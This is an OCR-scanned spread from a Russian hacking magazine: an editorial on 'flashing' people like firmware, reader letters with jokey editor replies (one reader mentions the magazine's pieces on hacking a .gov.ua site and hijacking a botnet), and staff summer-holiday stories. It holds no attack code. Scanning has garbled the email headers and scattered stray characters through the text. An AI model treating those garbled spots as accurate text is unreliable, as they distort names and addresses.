ВОТ ТУТ-ТО И НАЧИНАЮТСЯ ЧУДЕ- 
СА. ОДНОГО ПРОШИЛИ ЗАБОТЛИ- 
ВЫЕ РУКИ ДВУХ БАБУШЕК И ТРЕХ 
ТЕТУШЕК, И ДО СИХ ПОР НЕПО- 
НЯТНО «МУЖСКАЯ» У НЕГО ВНУТ- 
РИ ПРОГРАММА, ИЛИ «ЖЕНСКАЯ», 
ДРУГОМУ БОДРЫЙ ФИРМАРЬ СО 
МНОГИМИ НУЛЯМИ ЗАЛИЛ ПАПА- 
ОЛИГАРХ, ТРЕТИЙ ЗАФЛЕШИЛ СЕ- 
БЕ В ГОЛОВУ КРЭКНУТУЮ НАРКО- 
ВЕРСИЮ ВОРОВАННОЙ ПРОШИВ- 
КИ И ВО ЦВЕТЕ ЛЕТ ОТБРОСИЛ 
ЛАСТЫ ОТ ПЕРЕРАЗГОНА, ЧЕТВЕР- 
ТЫЙ ТАК И НЕ СПОДОБИЛСЯ ПО- 



ЗАБОТИТЬСЯ О СЕБЕ И СОГЛА- 
СИЛСЯ НА САМЫЙ ОБЫЧНЫЙ 
«СРЕДНЕСТАТИСТИЧЕСКИЙ» 
СОФТ, СТАВ ТАК НАЗЫВАЕМЫМ 
БЕЗЛИКИМ «ЭЛЕКТОРАТОМ». Я 
ЭТО ВСЕ ПИШУ СОВСЕМ НЕ ДЛЯ 
ТОГО, ЧТОБЫ НАПУГАТЬ ПОДРАС- 
ТАЮЩЕЕ ПОКОЛЕНИЕ. СОВСЕМ 
НАОБОРОТ, Я ХОЧУ НАС ВСЕХ УС- 
ПОКОИТЬ: НЕ БОЙТЕСЬ, НИКТО НЕ 
БУДЕТ НИЧЕГО ДЕЛАТЬ ДЛЯ НАС. 
КРОМЕ НАС САМИХ. КРОМЕ ВАС 
САМИХ. КРОМЕ ТЕБЯ... КСТАТИ, 
КТО ПРОШИЛ ТЕБЯ? И ЧЕМ? 



ВеіПриветствую, Олег. Спасибо за большое и толковое письмо. Ком- 
ментировать ничего не буду, нечего тут комментировать. С тех самых 
пор, как вышел в свет первый номер ][, журнал постоянно менялся с уче- 
том ваших просьб и пожеланий. Я знаю, о чем говорю, так было, уверен 
— так и будет впредь. А ][-политику определяют читатели, не сомневай- 
ся, твое мнение уже учтено. Жди изменений к лучшему :). 

Ггот: А2акизіІоѵ@гатЫег.ги 
§иЬ|: о жизни... 

очень понравилась наклеечка со статьями УК... жаль тока что на Укра- 
ине, (а я там живу =)) не актуальна она =( у нас аналогичные статьи под 
другими номерами... был бы рад если б вы сделали подарок для украи- 
нских Хакеров — такой же стикер тока украинизированный =)))) и еще... 
заметил пару багов, в статье про взлом сайта в зоне .доѵ.иа допущена 
очепятка вместо .иа написано .ик 
а статья про угон ботнэта неожиданно обрываеться =( 
з.ы. не хотите сайтик поПиАрить гакиз.пт.ш? сделайте подарок больно- 
му человеку (болею манией величия=))) может найдете на нем что то ин- 
тересное, опубликуете... эхх... 

з.ы.ы а если у вас ко мне какие то притензии по поводу письма — то «вы- 
пейте ЙАДУ2 =)))) 

Ве:Мое почтение, молодой человек. Мы приятно удивились, узнав, что 
на Украине тоже есть УК. Это ничего, что статьи у вас там другие, зато 
их на всех хватает :). Указанную опечатку впредь искореним, статью 
продолжим. Сайтик попиарим, а если найдем на нем что-нибудь «инте- 
ресненькое», то постараемся сразу определить, под какую статью в УК 
это «интересненькое» может попасть. Претензий у нас к тебе нет, есть 
рекомендация: выпей ЙОДУ! 



САМОЕ НЕЖНОЕ ПИСЬМО НОМЕРА 

Ггот: госк-апсІ-Ьгаѵе [госк-апсІ-Ьгаѵе@уапсІех.ги] 

8иЬ|: Вступитесь за нас! 

Здравствуйте, дорогие редакторы журнала «][акер»! Я Ваш журнал стала 
читать относительно недавно, но за это короткое время многому уже нау- 
чилась. Честно говоря, все мои друзья, узнавая, что я читаю Ваш журнал, 
ухмыляются, наивно полагая, что ни одна девушка неспособна понять, что 
же пишут в журнале о компьютерах. Ну ведь правда, подавляющее количе- 
ство парней полагают, что у всех девушек куриные мозги. Но ведь это не 
так!!!!!!!!!! Вступитесь за нас, дорогие редакторы! Напишите, что попадают- 
ся умные девушки и женщины, которые разбираются в компах и не красне- 
ют от слова аЬогІ!!!!!! Теперь о Вас. Верните фотки авторов в журнал. Мы 
должны знать Вас в лицо. Во-первых, чтобы при случайной встрече кидать- 
ся Вам на шею с криком «А я вас знаю!», а во-вторых, всегда интересно 
посмотреть на морду лица человека, написавшего статью. Девушкам осо- 
бенно интересно. Вот. На этом мои скромные требования заканчиваются. 
Ну, кроме того, что не требую, а просто искренне желаю Вашему журналу 
расти, толстеть, цвести и пахнуть. Вот. Наше вам с кисточкой. Ваша N. 

Р.З. Передавайте привет Хинту. Я видела его фотку в старых номерах, у него 
глаза симпатичные. За такие глаза можно простить любую лажу с дисками... 

Не: Привет, дорогая наша N. Разумеется, ты написала все правильно и 
понятно, я с тобой согласен: мальчишки — дураки! Вообще-то открою те- 
бе страшную тайну: в мужских коллективах даже как-то и не принято об- 
суждать постулат о том, что все женщины... эээ... думают не так эффек- 
тивно, как мы :). А в остальном — да. Мы согласны. На все! 

Р.З. Привет Хинту передаю. Считаю, что Хинт как честный человек и настоя- 
щий мужчина обязан на тебе жениться после таких нежных признаний. Будете 
жить-поживать вместе, и править баги на пару. Согласна ли ты, дорогая? © 
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ВОТ И НАСТУПИЛА ОСЕНЬ. ПОРА ПОГРУЖЕНИЯ ВСЕГО ЖИ- 
ВОГО В ПОЛУДРЕМ, ПОРА ЖЕЛТОЙ ОПАВШЕЙ ЛИСТВЫ И НА- 
ЧАЛА УЧЕБНОГО ПРОЦЕССА. м ВОТ ЛЕТО ПРОЛЕТЕЛО, ВСЕ 
ОСТАЛОСЬ ПОЗАДИ" — ТАК ПЕЛИ ПАРНИ ИЗ СТДК. СОВЕР- 
ШЕННО ВЕРНО — ВСЕ ОСТАЛОСЬ ПОЗАДИ. НО ЧТО ИМЕННО 
ТАМ ОСТАЛОСЬ? ДАВАЙ УЗНАЕМ ЭТО ОТ РЕБЯТ ИЗ НАШЕЙ 
КОМАНДЫ. 



О 

< о 



=> 

л 

ю 

о 



со 

О) 

о 

о. 

ш 

< 

X 




ЛІІіІЬш Лето было замечательное. В июне я, как и положено, разбирался с институтскими делами, попутно 
рассекая по городу на роллах и играя в бадминтон, а в конце июля мы вдвоем с девушкой отправились в ро- 
мантическое путешествие на машине в Крым, не дождавшись падонков в лице Бублоса, Олега и Ва- 
ни. В целом поездка удалась на 5+, потому что такого количества впечатлений, адреналина і 
мегапозитива у меня еще не было. Мы совершенно замечательно кушали персики, жили 
вдвоем под тентиком в районе Алушты, затем смотрели на полосатых рыбок под во- 
дой и кормили вишней крабов под Новым Светом, а в конце путешествия мы 
заехали пожать Г орлуму руку под Феодосию, поискали в песках местных 
пляжей ключи от машины, а затем на три денька заехали в славный 
город Харьков. Там мы пообщались с большим количеством 
классных людей, изучили город как свои пять пальцев, ката- 
лись на смешном метро, рассекали по улице Сумской на ро- 
ликах и замечательно проводили время. Лето удалось 
:).ІЮ0І11ІІІ Этим летом впервые за последние четыре года я 
смог нормально отдохнуть. Сначала заехал к друзьям в 
славный город-герой экс-Ленинград, потом с Куттером и 
еще одним одногруппником смотались на машине в Нижний 



Новгород, где наутро у меня чуть не отобрали права за небольшое ко- 
личество промилле в крови. А после я со своими друзьями, Куттером и 
НСД, поехали на машине в Крым. Я первый раз в жизни увидел море, потусо- 
вал на Казантипе, увидел большое количество красивых девушек одновременно в од- 
ном месте. На Казантипе, кстати, меня совершенно случайно узнал в лицо один наш чита- 
тель из Кривого Рога. Хороший оказался парень, много времени протусовались вместе. В 
итоге, все заболевшие-простывшие, но жутко довольные, мы вернулись домой. Сейчас я пи- 
шу этот текст, а у меня температура 39, но все равно я рад прошедшему лету и ничуть не со- 
жалею о том, как его провел, Шѵ Лето у меня, как и у большинства студентов, началось с 
сессии. А точнее, с подготовки к экзаменам. Г отовился я долго и усердно, поэтому сдал все на 
«отлично» (ну не умею я списывать, а желание учиться пока есть :)). После сдачи основных 
предметов, мне предложили принять участие в конкурсе на стипендию Б.Н. Ельцина. Я согла- 
сился, но для этого пришлось пересдавать еще 8 предметов на повышенную оценку (всякие ба- 
зовые дисциплины 1 — 2 курса). Я успешно с этим справился и, таким образом, логически завер- 
шил половину лета. Затем мне предстояло выдержать еще один жизненный этап — сборы на во- 
енной кафедре. Целый месяц я маршировал по плацу, ел армейскую перловку, дышал экологичес- 
ки чистым полевым воздухом и даже сдавал госэкзамены. По приезду у меня оставалось всего 3 
недели для отдыха. Настоящего, полноценного отдыха. Но стоило мне расслабиться, как меня начал 
пинать Никитоз за несданные материалы. И только рассчитавшись с ним, я наконец-то получил пра- 
во на отдых. Правда, погода немного подвела и последние три недели лета мне пришлось провести до- 
ма в компании хороших друзей и вкусного пива :). ийщіШІІЗ Это было насыщенное лето. Для начала, 
я заработал немного геморроя на учебе, поскольку сдавал госэкзамены и получал диплом, подведя, та- 
ким образом, итог шести годам обучения на медфаке РУДН :). А дальше — отдых. На этот раз мы с под- 
ругой решили двинуть дикарями в Адлер (Сочинский район), купили туда билеты на поезд и — ту-ту Миха- 
ил Светлофф. Поезд проезжал через Таганрог, в котором и состоялась Х-встреча номер один с Алексом Це- 
лых редактором Импланта. Стояли мы там всего 1 0 минут, поэтому мы успели только перекинуться парой 
слов, а я успел получить из его рук некоторое количество продуктового стаффа для дальнейшей поездки :). 
Следующая Х-встреча ждала меня в Адлере. Дело в том, что Михаил Фленов ака Ноггійс в этот момент отды- 
хал с семьей в Г еленжике, это относительно недалеко, и поскольку мы с ним не виделись уже несколько лет, 
было решено, что он приедет встретиться (на машине). Это был настоящий героизм, за что ему большой рес- 
пект :), поскольку дорога оказалась а) не такой уж короткой б) серпантином и в) Михаилу с семьей и детьми 
пришлось пилить по ней пять часов, а приехали они только к полуночи. Ночью мы выпили винца, утром иску- 
пались, и они двинулись в обратную дорогу. В общем, отдых удался, приехал домой я в 5 утра и сразу ринул- 
ся в Х-работу, поскольку, как оказалось, весьма по ней соскучился :). =е= 
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